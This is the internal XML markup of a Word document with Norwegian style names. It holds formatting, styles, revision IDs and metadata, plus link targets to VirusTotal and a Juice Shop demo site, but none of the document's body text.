          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="005B4891">
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="2370B3E9" w14:textId="77777777" w:rsidR="001A63C2" w:rsidRPr="005B4891" w:rsidRDefault="001A63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69FB4" w14:textId="77777777" w:rsidR="002F6E0D" w:rsidRPr="005B4891" w:rsidRDefault="002F6E0D" w:rsidP="000910D5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5478AEDD" w14:textId="77777777" w:rsidR="002F6E0D" w:rsidRPr="005B4891" w:rsidRDefault="002F6E0D" w:rsidP="000910D5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="0D497697" w14:textId="77777777" w:rsidR="002F6E0D" w:rsidRPr="005B4891" w:rsidRDefault="002F6E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D28F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D388AA96"/>
    <w:lvl w:ilvl="0" w:tplc="48F2E7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5038B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A050B47E"/>
    <w:lvl w:ilvl="0" w:tplc="119A99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6676">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="138374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C8"/>
    <w:rsid w:val="00000D40"/>
    <w:rsid w:val="00012FA9"/>
    <w:rsid w:val="00020333"/>
    <w:rsid w:val="00026B79"/>
    <w:rsid w:val="00030642"/>
    <w:rsid w:val="00052C72"/>
    <w:rsid w:val="00054E56"/>
    <w:rsid w:val="00064E5C"/>
    <w:rsid w:val="00066801"/>
    <w:rsid w:val="00067393"/>
    <w:rsid w:val="00067DC5"/>
    <w:rsid w:val="0007057B"/>
    <w:rsid w:val="00074EDF"/>
    <w:rsid w:val="00076D48"/>
    <w:rsid w:val="000801E6"/>
    <w:rsid w:val="00080A8D"/>
    <w:rsid w:val="00084E3D"/>
    <w:rsid w:val="000905D1"/>
    <w:rsid w:val="000910D5"/>
    <w:rsid w:val="000944B6"/>
    <w:rsid w:val="000A79C8"/>
    <w:rsid w:val="000B08B4"/>
    <w:rsid w:val="000B6DF3"/>
    <w:rsid w:val="000C0A4C"/>
    <w:rsid w:val="000C2A4E"/>
    <w:rsid w:val="000C63D9"/>
    <w:rsid w:val="000C703C"/>
    <w:rsid w:val="000D651A"/>
    <w:rsid w:val="000E1D43"/>
    <w:rsid w:val="000E4612"/>
    <w:rsid w:val="000E61D3"/>
    <w:rsid w:val="000F1880"/>
    <w:rsid w:val="000F36F4"/>
    <w:rsid w:val="000F6318"/>
    <w:rsid w:val="00101BB6"/>
    <w:rsid w:val="0010204D"/>
    <w:rsid w:val="00110EF9"/>
    <w:rsid w:val="0011577B"/>
    <w:rsid w:val="0011617B"/>
    <w:rsid w:val="0011645C"/>
    <w:rsid w:val="0012491B"/>
    <w:rsid w:val="00124E44"/>
    <w:rsid w:val="00131E14"/>
    <w:rsid w:val="001329C6"/>
    <w:rsid w:val="00132DA5"/>
    <w:rsid w:val="00141274"/>
    <w:rsid w:val="00152B3C"/>
    <w:rsid w:val="0016416C"/>
    <w:rsid w:val="00166BEF"/>
    <w:rsid w:val="00171C56"/>
    <w:rsid w:val="0017741E"/>
    <w:rsid w:val="00185077"/>
    <w:rsid w:val="0019165B"/>
    <w:rsid w:val="00192351"/>
    <w:rsid w:val="001934C4"/>
    <w:rsid w:val="00193CA7"/>
    <w:rsid w:val="001959B4"/>
    <w:rsid w:val="001961D1"/>
    <w:rsid w:val="001A01D2"/>
    <w:rsid w:val="001A1431"/>
    <w:rsid w:val="001A4B65"/>
    <w:rsid w:val="001A63C2"/>
    <w:rsid w:val="001A6C5F"/>
    <w:rsid w:val="001B08C9"/>
    <w:rsid w:val="001B1242"/>
    <w:rsid w:val="001B6267"/>
    <w:rsid w:val="001B7633"/>
    <w:rsid w:val="001C2BB6"/>
    <w:rsid w:val="001C5796"/>
    <w:rsid w:val="001D037B"/>
    <w:rsid w:val="001D0A28"/>
    <w:rsid w:val="001D1BE1"/>
    <w:rsid w:val="001D4DE0"/>
    <w:rsid w:val="001E1842"/>
    <w:rsid w:val="001E1E0D"/>
    <w:rsid w:val="001F3830"/>
    <w:rsid w:val="001F3939"/>
    <w:rsid w:val="001F5568"/>
    <w:rsid w:val="001F5C9D"/>
    <w:rsid w:val="001F61C9"/>
    <w:rsid w:val="0020631C"/>
    <w:rsid w:val="00211CCC"/>
    <w:rsid w:val="002230B5"/>
    <w:rsid w:val="00224FAB"/>
    <w:rsid w:val="00230560"/>
    <w:rsid w:val="00231286"/>
    <w:rsid w:val="002339F2"/>
    <w:rsid w:val="00235807"/>
    <w:rsid w:val="00241967"/>
    <w:rsid w:val="002476D5"/>
    <w:rsid w:val="00250F6D"/>
    <w:rsid w:val="002510D8"/>
    <w:rsid w:val="00255C47"/>
    <w:rsid w:val="00261E5D"/>
    <w:rsid w:val="0026785D"/>
    <w:rsid w:val="00267967"/>
    <w:rsid w:val="00281FFD"/>
    <w:rsid w:val="00282E0D"/>
    <w:rsid w:val="00285FC1"/>
    <w:rsid w:val="0028669C"/>
    <w:rsid w:val="002934FD"/>
    <w:rsid w:val="002A71E1"/>
    <w:rsid w:val="002B1432"/>
    <w:rsid w:val="002B63ED"/>
    <w:rsid w:val="002B645B"/>
    <w:rsid w:val="002C0FEC"/>
    <w:rsid w:val="002C156F"/>
    <w:rsid w:val="002C2769"/>
    <w:rsid w:val="002C71D9"/>
    <w:rsid w:val="002C789C"/>
    <w:rsid w:val="002D1448"/>
    <w:rsid w:val="002D24BB"/>
    <w:rsid w:val="002D5121"/>
    <w:rsid w:val="002D5573"/>
    <w:rsid w:val="002D7361"/>
    <w:rsid w:val="002E3A9B"/>
    <w:rsid w:val="002F450B"/>
    <w:rsid w:val="002F6E0D"/>
    <w:rsid w:val="002F70EF"/>
    <w:rsid w:val="00303492"/>
    <w:rsid w:val="00304E3C"/>
    <w:rsid w:val="00312867"/>
    <w:rsid w:val="00315F6A"/>
    <w:rsid w:val="00320D68"/>
    <w:rsid w:val="003236BB"/>
    <w:rsid w:val="003254B4"/>
    <w:rsid w:val="00330819"/>
    <w:rsid w:val="00335140"/>
    <w:rsid w:val="00343C3C"/>
    <w:rsid w:val="00350A23"/>
    <w:rsid w:val="00351207"/>
    <w:rsid w:val="003521D2"/>
    <w:rsid w:val="00356600"/>
    <w:rsid w:val="003616FC"/>
    <w:rsid w:val="00367094"/>
    <w:rsid w:val="00367B16"/>
    <w:rsid w:val="0037098D"/>
    <w:rsid w:val="00373FED"/>
    <w:rsid w:val="0037575D"/>
    <w:rsid w:val="00377A4D"/>
    <w:rsid w:val="00382559"/>
    <w:rsid w:val="00386741"/>
    <w:rsid w:val="00386D96"/>
    <w:rsid w:val="0039059F"/>
    <w:rsid w:val="003911DE"/>
    <w:rsid w:val="0039210A"/>
    <w:rsid w:val="003946E1"/>
    <w:rsid w:val="00396765"/>
    <w:rsid w:val="003A4851"/>
    <w:rsid w:val="003A58B7"/>
    <w:rsid w:val="003B202E"/>
    <w:rsid w:val="003B50C4"/>
    <w:rsid w:val="003B5747"/>
    <w:rsid w:val="003B6CC1"/>
    <w:rsid w:val="003C0F27"/>
    <w:rsid w:val="003C71DE"/>
    <w:rsid w:val="003D14BF"/>
    <w:rsid w:val="003E0A68"/>
    <w:rsid w:val="003E5FA0"/>
    <w:rsid w:val="003F0628"/>
    <w:rsid w:val="003F15F6"/>
    <w:rsid w:val="003F1FD5"/>
    <w:rsid w:val="003F4EEC"/>
    <w:rsid w:val="004024C3"/>
    <w:rsid w:val="0041121D"/>
    <w:rsid w:val="00413433"/>
    <w:rsid w:val="00413C80"/>
    <w:rsid w:val="0042378A"/>
    <w:rsid w:val="00425AD7"/>
    <w:rsid w:val="004306C9"/>
    <w:rsid w:val="004360E1"/>
    <w:rsid w:val="004364EC"/>
    <w:rsid w:val="00442D62"/>
    <w:rsid w:val="004472C6"/>
    <w:rsid w:val="00450136"/>
    <w:rsid w:val="00453414"/>
    <w:rsid w:val="004550B8"/>
    <w:rsid w:val="00463DEE"/>
    <w:rsid w:val="00474639"/>
    <w:rsid w:val="004769BA"/>
    <w:rsid w:val="004804DE"/>
    <w:rsid w:val="00490E43"/>
    <w:rsid w:val="00491F28"/>
    <w:rsid w:val="004930B4"/>
    <w:rsid w:val="00493255"/>
    <w:rsid w:val="004A6C3C"/>
    <w:rsid w:val="004A7759"/>
    <w:rsid w:val="004C776F"/>
    <w:rsid w:val="004D1E86"/>
    <w:rsid w:val="004D4578"/>
    <w:rsid w:val="004D5553"/>
    <w:rsid w:val="004D55A7"/>
    <w:rsid w:val="004E28D2"/>
    <w:rsid w:val="004F0062"/>
    <w:rsid w:val="004F20D1"/>
    <w:rsid w:val="004F4864"/>
    <w:rsid w:val="004F5618"/>
    <w:rsid w:val="005145BE"/>
    <w:rsid w:val="00517E95"/>
    <w:rsid w:val="00520960"/>
    <w:rsid w:val="00525ED3"/>
    <w:rsid w:val="0053492F"/>
    <w:rsid w:val="00535491"/>
    <w:rsid w:val="00535D91"/>
    <w:rsid w:val="00536C4E"/>
    <w:rsid w:val="005372BF"/>
    <w:rsid w:val="00541BAA"/>
    <w:rsid w:val="005429C5"/>
    <w:rsid w:val="0054329A"/>
    <w:rsid w:val="005466CC"/>
    <w:rsid w:val="005504EA"/>
    <w:rsid w:val="005508CC"/>
    <w:rsid w:val="00555A97"/>
    <w:rsid w:val="00563ADA"/>
    <w:rsid w:val="0056691B"/>
    <w:rsid w:val="0057275B"/>
    <w:rsid w:val="00573972"/>
    <w:rsid w:val="0057610F"/>
    <w:rsid w:val="00577B6B"/>
    <w:rsid w:val="00582A7D"/>
    <w:rsid w:val="00585949"/>
    <w:rsid w:val="005861D7"/>
    <w:rsid w:val="0059129E"/>
    <w:rsid w:val="00591B92"/>
    <w:rsid w:val="00594705"/>
    <w:rsid w:val="00594917"/>
    <w:rsid w:val="00595833"/>
    <w:rsid w:val="00596D50"/>
    <w:rsid w:val="005A1823"/>
    <w:rsid w:val="005A1CAC"/>
    <w:rsid w:val="005A4528"/>
    <w:rsid w:val="005B010C"/>
    <w:rsid w:val="005B41C3"/>
    <w:rsid w:val="005B4891"/>
    <w:rsid w:val="005B4F85"/>
    <w:rsid w:val="005C033F"/>
    <w:rsid w:val="005D0134"/>
    <w:rsid w:val="005D029F"/>
    <w:rsid w:val="005D2AB1"/>
    <w:rsid w:val="005D3708"/>
    <w:rsid w:val="005E3157"/>
    <w:rsid w:val="005F5565"/>
    <w:rsid w:val="006059F5"/>
    <w:rsid w:val="00606E0B"/>
    <w:rsid w:val="00607A87"/>
    <w:rsid w:val="00626427"/>
    <w:rsid w:val="00631B1A"/>
    <w:rsid w:val="00633FFA"/>
    <w:rsid w:val="0064197D"/>
    <w:rsid w:val="00645E67"/>
    <w:rsid w:val="00646BDA"/>
    <w:rsid w:val="006476E2"/>
    <w:rsid w:val="006556BC"/>
    <w:rsid w:val="00655C06"/>
    <w:rsid w:val="00660FC6"/>
    <w:rsid w:val="0066191C"/>
    <w:rsid w:val="006760A7"/>
    <w:rsid w:val="00677047"/>
    <w:rsid w:val="006946A3"/>
    <w:rsid w:val="006946EA"/>
    <w:rsid w:val="00696E66"/>
    <w:rsid w:val="006A3A01"/>
    <w:rsid w:val="006B35FE"/>
    <w:rsid w:val="006B3B60"/>
    <w:rsid w:val="006C3720"/>
    <w:rsid w:val="006C4286"/>
    <w:rsid w:val="006C428F"/>
    <w:rsid w:val="006C5B02"/>
    <w:rsid w:val="006C71D9"/>
    <w:rsid w:val="006C7876"/>
    <w:rsid w:val="006D20D1"/>
    <w:rsid w:val="006D29E2"/>
    <w:rsid w:val="006E21A9"/>
    <w:rsid w:val="006E3604"/>
    <w:rsid w:val="006F20F3"/>
    <w:rsid w:val="00701AE2"/>
    <w:rsid w:val="00703EC8"/>
    <w:rsid w:val="00711612"/>
    <w:rsid w:val="007117CA"/>
    <w:rsid w:val="00713BA6"/>
    <w:rsid w:val="00720393"/>
    <w:rsid w:val="00721C96"/>
    <w:rsid w:val="00725D42"/>
    <w:rsid w:val="00736DE6"/>
    <w:rsid w:val="00751691"/>
    <w:rsid w:val="00753763"/>
    <w:rsid w:val="007647D8"/>
    <w:rsid w:val="0076537C"/>
    <w:rsid w:val="00774900"/>
    <w:rsid w:val="007767D9"/>
    <w:rsid w:val="00776D5F"/>
    <w:rsid w:val="0078119A"/>
    <w:rsid w:val="0078486F"/>
    <w:rsid w:val="0078547F"/>
    <w:rsid w:val="007A2EC8"/>
    <w:rsid w:val="007A3320"/>
    <w:rsid w:val="007A3515"/>
    <w:rsid w:val="007B1649"/>
    <w:rsid w:val="007B169E"/>
    <w:rsid w:val="007B50D7"/>
    <w:rsid w:val="007B55F3"/>
    <w:rsid w:val="007C00F1"/>
    <w:rsid w:val="007C3D89"/>
    <w:rsid w:val="007C45C4"/>
    <w:rsid w:val="007C6F5F"/>
    <w:rsid w:val="007D3DD7"/>
    <w:rsid w:val="007E4506"/>
    <w:rsid w:val="007F15A6"/>
    <w:rsid w:val="007F79F3"/>
    <w:rsid w:val="00805BFD"/>
    <w:rsid w:val="008108AA"/>
    <w:rsid w:val="00812B9A"/>
    <w:rsid w:val="00816250"/>
    <w:rsid w:val="00826F9B"/>
    <w:rsid w:val="0083103B"/>
    <w:rsid w:val="00841794"/>
    <w:rsid w:val="00847BEF"/>
    <w:rsid w:val="00850944"/>
    <w:rsid w:val="00853E92"/>
    <w:rsid w:val="00854024"/>
    <w:rsid w:val="00860FDE"/>
    <w:rsid w:val="00861611"/>
    <w:rsid w:val="008723DD"/>
    <w:rsid w:val="00872EC3"/>
    <w:rsid w:val="00876B7E"/>
    <w:rsid w:val="008804F0"/>
    <w:rsid w:val="00884755"/>
    <w:rsid w:val="00887FBD"/>
    <w:rsid w:val="00895687"/>
    <w:rsid w:val="008976D0"/>
    <w:rsid w:val="008A28F3"/>
    <w:rsid w:val="008A3410"/>
    <w:rsid w:val="008B52A9"/>
    <w:rsid w:val="008B53A3"/>
    <w:rsid w:val="008B5D2A"/>
    <w:rsid w:val="008B7DCE"/>
    <w:rsid w:val="008D2597"/>
    <w:rsid w:val="008D6CF4"/>
    <w:rsid w:val="008E01DE"/>
    <w:rsid w:val="008E5C36"/>
    <w:rsid w:val="008F45C6"/>
    <w:rsid w:val="008F4D79"/>
    <w:rsid w:val="008F6B90"/>
    <w:rsid w:val="008F7CE2"/>
    <w:rsid w:val="00903040"/>
    <w:rsid w:val="009034B4"/>
    <w:rsid w:val="00905A81"/>
    <w:rsid w:val="009068E1"/>
    <w:rsid w:val="00906A68"/>
    <w:rsid w:val="009103D7"/>
    <w:rsid w:val="009104C4"/>
    <w:rsid w:val="00913E3B"/>
    <w:rsid w:val="00914BE9"/>
    <w:rsid w:val="00921C74"/>
    <w:rsid w:val="00922BB2"/>
    <w:rsid w:val="00924EC4"/>
    <w:rsid w:val="0093136B"/>
    <w:rsid w:val="009377AA"/>
    <w:rsid w:val="0095141A"/>
    <w:rsid w:val="00952BE5"/>
    <w:rsid w:val="00953071"/>
    <w:rsid w:val="009603B5"/>
    <w:rsid w:val="00962883"/>
    <w:rsid w:val="0096734E"/>
    <w:rsid w:val="00975792"/>
    <w:rsid w:val="00975A5B"/>
    <w:rsid w:val="009763AD"/>
    <w:rsid w:val="00977427"/>
    <w:rsid w:val="00977957"/>
    <w:rsid w:val="00981E6D"/>
    <w:rsid w:val="00986910"/>
    <w:rsid w:val="009947F9"/>
    <w:rsid w:val="009A103C"/>
    <w:rsid w:val="009A1EAB"/>
    <w:rsid w:val="009A233F"/>
    <w:rsid w:val="009A2951"/>
    <w:rsid w:val="009A2A3A"/>
    <w:rsid w:val="009A5495"/>
    <w:rsid w:val="009B101B"/>
    <w:rsid w:val="009C57D6"/>
    <w:rsid w:val="009D314A"/>
    <w:rsid w:val="009D3404"/>
    <w:rsid w:val="009D4CAB"/>
    <w:rsid w:val="009D58E3"/>
    <w:rsid w:val="009F73E3"/>
    <w:rsid w:val="00A00FDF"/>
    <w:rsid w:val="00A02BEB"/>
    <w:rsid w:val="00A05553"/>
    <w:rsid w:val="00A10564"/>
    <w:rsid w:val="00A15DEB"/>
    <w:rsid w:val="00A20DF6"/>
    <w:rsid w:val="00A348AD"/>
    <w:rsid w:val="00A350A3"/>
    <w:rsid w:val="00A353ED"/>
    <w:rsid w:val="00A45A24"/>
    <w:rsid w:val="00A55C7D"/>
    <w:rsid w:val="00A6112A"/>
    <w:rsid w:val="00A637A8"/>
    <w:rsid w:val="00A70063"/>
    <w:rsid w:val="00A721C3"/>
    <w:rsid w:val="00A77CE9"/>
    <w:rsid w:val="00A81670"/>
    <w:rsid w:val="00A834CA"/>
    <w:rsid w:val="00A85E59"/>
    <w:rsid w:val="00A91AD6"/>
    <w:rsid w:val="00A9306D"/>
    <w:rsid w:val="00AA0653"/>
    <w:rsid w:val="00AA1C85"/>
    <w:rsid w:val="00AA233A"/>
    <w:rsid w:val="00AA24A2"/>
    <w:rsid w:val="00AA5CA6"/>
    <w:rsid w:val="00AB27F8"/>
    <w:rsid w:val="00AB2F66"/>
    <w:rsid w:val="00AB71E6"/>
    <w:rsid w:val="00AC0203"/>
    <w:rsid w:val="00AC1A5E"/>
    <w:rsid w:val="00AC4392"/>
    <w:rsid w:val="00AC5805"/>
    <w:rsid w:val="00AC58A6"/>
    <w:rsid w:val="00AD2398"/>
    <w:rsid w:val="00AD2E2A"/>
    <w:rsid w:val="00AD44AF"/>
    <w:rsid w:val="00AE16A9"/>
    <w:rsid w:val="00AE4BCD"/>
    <w:rsid w:val="00AE5B59"/>
    <w:rsid w:val="00AE6299"/>
    <w:rsid w:val="00AE71D4"/>
    <w:rsid w:val="00AF1074"/>
    <w:rsid w:val="00AF1BBD"/>
    <w:rsid w:val="00B024AA"/>
    <w:rsid w:val="00B0512A"/>
    <w:rsid w:val="00B10135"/>
    <w:rsid w:val="00B10D9F"/>
    <w:rsid w:val="00B11F86"/>
    <w:rsid w:val="00B120D1"/>
    <w:rsid w:val="00B21845"/>
    <w:rsid w:val="00B30162"/>
    <w:rsid w:val="00B319C4"/>
    <w:rsid w:val="00B33812"/>
    <w:rsid w:val="00B34033"/>
    <w:rsid w:val="00B34758"/>
    <w:rsid w:val="00B445AE"/>
    <w:rsid w:val="00B476F3"/>
    <w:rsid w:val="00B54C9D"/>
    <w:rsid w:val="00B56A2A"/>
    <w:rsid w:val="00B70666"/>
    <w:rsid w:val="00B7461B"/>
    <w:rsid w:val="00B75570"/>
    <w:rsid w:val="00B779D8"/>
    <w:rsid w:val="00B82B95"/>
    <w:rsid w:val="00B8391B"/>
    <w:rsid w:val="00B83DED"/>
    <w:rsid w:val="00B90B68"/>
    <w:rsid w:val="00B90EEC"/>
    <w:rsid w:val="00B92BE6"/>
    <w:rsid w:val="00B942B5"/>
    <w:rsid w:val="00B977B0"/>
    <w:rsid w:val="00BA6AE0"/>
    <w:rsid w:val="00BB2FDC"/>
    <w:rsid w:val="00BB47D9"/>
    <w:rsid w:val="00BC2C64"/>
    <w:rsid w:val="00BC513C"/>
    <w:rsid w:val="00BD1BA0"/>
    <w:rsid w:val="00BD3C2D"/>
    <w:rsid w:val="00BE6B88"/>
    <w:rsid w:val="00BF12EA"/>
    <w:rsid w:val="00BF32FF"/>
    <w:rsid w:val="00BF5DE0"/>
    <w:rsid w:val="00C010E8"/>
    <w:rsid w:val="00C0238A"/>
    <w:rsid w:val="00C05AC8"/>
    <w:rsid w:val="00C1131A"/>
    <w:rsid w:val="00C120BB"/>
    <w:rsid w:val="00C12F84"/>
    <w:rsid w:val="00C130E3"/>
    <w:rsid w:val="00C13681"/>
    <w:rsid w:val="00C138EB"/>
    <w:rsid w:val="00C14C6C"/>
    <w:rsid w:val="00C239DC"/>
    <w:rsid w:val="00C272A7"/>
    <w:rsid w:val="00C27A60"/>
    <w:rsid w:val="00C347E4"/>
    <w:rsid w:val="00C43603"/>
    <w:rsid w:val="00C55426"/>
    <w:rsid w:val="00C563A7"/>
    <w:rsid w:val="00C56531"/>
    <w:rsid w:val="00C57352"/>
    <w:rsid w:val="00C63B38"/>
    <w:rsid w:val="00C63F42"/>
    <w:rsid w:val="00C657DD"/>
    <w:rsid w:val="00C716C9"/>
    <w:rsid w:val="00C71BD1"/>
    <w:rsid w:val="00C7377F"/>
    <w:rsid w:val="00C73901"/>
    <w:rsid w:val="00C743C6"/>
    <w:rsid w:val="00C76A7C"/>
    <w:rsid w:val="00C81641"/>
    <w:rsid w:val="00C82463"/>
    <w:rsid w:val="00C83C09"/>
    <w:rsid w:val="00C87154"/>
    <w:rsid w:val="00CB2462"/>
    <w:rsid w:val="00CB62EA"/>
    <w:rsid w:val="00CC6D2B"/>
    <w:rsid w:val="00CD2DE7"/>
    <w:rsid w:val="00CE07C2"/>
    <w:rsid w:val="00CE14A4"/>
    <w:rsid w:val="00CE50E7"/>
    <w:rsid w:val="00CE56AC"/>
    <w:rsid w:val="00CF1536"/>
    <w:rsid w:val="00CF3A26"/>
    <w:rsid w:val="00D0342C"/>
    <w:rsid w:val="00D12C98"/>
    <w:rsid w:val="00D14B43"/>
    <w:rsid w:val="00D217D9"/>
    <w:rsid w:val="00D23BD2"/>
    <w:rsid w:val="00D25889"/>
    <w:rsid w:val="00D35C81"/>
    <w:rsid w:val="00D37992"/>
    <w:rsid w:val="00D409D6"/>
    <w:rsid w:val="00D46C07"/>
    <w:rsid w:val="00D5401B"/>
    <w:rsid w:val="00D5479D"/>
    <w:rsid w:val="00D65530"/>
    <w:rsid w:val="00D66D64"/>
    <w:rsid w:val="00D7148F"/>
    <w:rsid w:val="00D720AF"/>
    <w:rsid w:val="00D81FBB"/>
    <w:rsid w:val="00D856EF"/>
    <w:rsid w:val="00D85C20"/>
    <w:rsid w:val="00D90878"/>
    <w:rsid w:val="00D9274B"/>
    <w:rsid w:val="00D93418"/>
    <w:rsid w:val="00D95117"/>
    <w:rsid w:val="00D96A40"/>
    <w:rsid w:val="00D97370"/>
    <w:rsid w:val="00DA2C45"/>
    <w:rsid w:val="00DA489D"/>
    <w:rsid w:val="00DA7F0F"/>
    <w:rsid w:val="00DB4D18"/>
    <w:rsid w:val="00DC0729"/>
    <w:rsid w:val="00DC4663"/>
    <w:rsid w:val="00DD0A81"/>
    <w:rsid w:val="00DD2FC8"/>
    <w:rsid w:val="00DD51AD"/>
    <w:rsid w:val="00DE339C"/>
    <w:rsid w:val="00DE4FBA"/>
    <w:rsid w:val="00DF0830"/>
    <w:rsid w:val="00E02E7B"/>
    <w:rsid w:val="00E07AB7"/>
    <w:rsid w:val="00E12884"/>
    <w:rsid w:val="00E164AE"/>
    <w:rsid w:val="00E17E59"/>
    <w:rsid w:val="00E21F07"/>
    <w:rsid w:val="00E40EBC"/>
    <w:rsid w:val="00E42BE0"/>
    <w:rsid w:val="00E432FB"/>
    <w:rsid w:val="00E4413F"/>
    <w:rsid w:val="00E442BC"/>
    <w:rsid w:val="00E55998"/>
    <w:rsid w:val="00E564C4"/>
    <w:rsid w:val="00E607BC"/>
    <w:rsid w:val="00E63D7A"/>
    <w:rsid w:val="00E7399A"/>
    <w:rsid w:val="00E75A81"/>
    <w:rsid w:val="00E77900"/>
    <w:rsid w:val="00E77C96"/>
    <w:rsid w:val="00E809A5"/>
    <w:rsid w:val="00E82478"/>
    <w:rsid w:val="00E83597"/>
    <w:rsid w:val="00E85330"/>
    <w:rsid w:val="00E86520"/>
    <w:rsid w:val="00EA2F67"/>
    <w:rsid w:val="00EA2FB0"/>
    <w:rsid w:val="00EA4118"/>
    <w:rsid w:val="00EA5929"/>
    <w:rsid w:val="00EB32EF"/>
    <w:rsid w:val="00EC67D1"/>
    <w:rsid w:val="00EC73EC"/>
    <w:rsid w:val="00EC7A25"/>
    <w:rsid w:val="00ED5F66"/>
    <w:rsid w:val="00EE1B5C"/>
    <w:rsid w:val="00EE4FA1"/>
    <w:rsid w:val="00F005C5"/>
    <w:rsid w:val="00F00624"/>
    <w:rsid w:val="00F00DBE"/>
    <w:rsid w:val="00F032D8"/>
    <w:rsid w:val="00F036EA"/>
    <w:rsid w:val="00F25B3A"/>
    <w:rsid w:val="00F272EB"/>
    <w:rsid w:val="00F43326"/>
    <w:rsid w:val="00F44491"/>
    <w:rsid w:val="00F449D3"/>
    <w:rsid w:val="00F47355"/>
    <w:rsid w:val="00F4745C"/>
    <w:rsid w:val="00F5514E"/>
    <w:rsid w:val="00F704E8"/>
    <w:rsid w:val="00F71B25"/>
    <w:rsid w:val="00F755B7"/>
    <w:rsid w:val="00F77629"/>
    <w:rsid w:val="00F84AB5"/>
    <w:rsid w:val="00F8540A"/>
    <w:rsid w:val="00F85AD7"/>
    <w:rsid w:val="00F932A0"/>
    <w:rsid w:val="00FA5FF4"/>
    <w:rsid w:val="00FA7015"/>
    <w:rsid w:val="00FB04BB"/>
    <w:rsid w:val="00FB4538"/>
    <w:rsid w:val="00FB6CF3"/>
    <w:rsid w:val="00FD2B81"/>
    <w:rsid w:val="00FD3ED9"/>
    <w:rsid w:val="00FE10B4"/>
    <w:rsid w:val="00FE1676"/>
    <w:rsid w:val="00FE76F0"/>
    <w:rsid w:val="00FF17BB"/>
    <w:rsid w:val="00FF1E95"/>
    <w:rsid w:val="779B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875E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{91010558-2D21-463B-9ADB-4520E694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B7E"/>
    <w:rPr>
      <w:noProof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A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5A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5A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05A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05A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05A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05A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05A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05A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05A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05A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5A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05AC8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05AC8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05AC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05AC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05AC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05AC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C05A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05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05A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05A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C05A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05AC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C05AC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C05AC8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05A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05AC8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C05AC8"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Tabellrutenett">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Vanligtabell"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00C05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85FC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85FC1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09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10D5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09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10D5"/>
    <w:rPr>
      <w:lang w:val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272EB"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
      <w:szCs w:val="32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F272E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272E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564C4"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="code">
    <w:name w:val="code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="codeTegn"/>
    <w:qFormat/>
    <w:rsid w:val="00701AE2"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="3B3838" w:themeFill="background2" w:themeFillShade="40"/>
      <w:tabs>
        <w:tab w:val="left" w:pos="2902"/>
        <w:tab w:val="left" w:pos="5118"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="codeTegn">
    <w:name w:val="code Tegn"/>
    <w:basedOn w:val="Standardskriftforavsnitt"/>
    <w:link w:val="code"/>
    <w:rsid w:val="00701AE2"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:shd w:val="clear" w:color="auto" w:fill="3B3838" w:themeFill="background2" w:themeFillShade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virustotal.com/gui/home/upload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tin@test.com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rtin@test.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uice-shop.herokuapp.com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4340-C88F-4B23-9A80-9E259059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8</TotalTime>
  <Pages>26</Pages>
  <Words>2439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leveland</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Martin Sleveland</cp:lastModifiedBy>
  <cp:revision>582</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-28T14:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-13T07:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>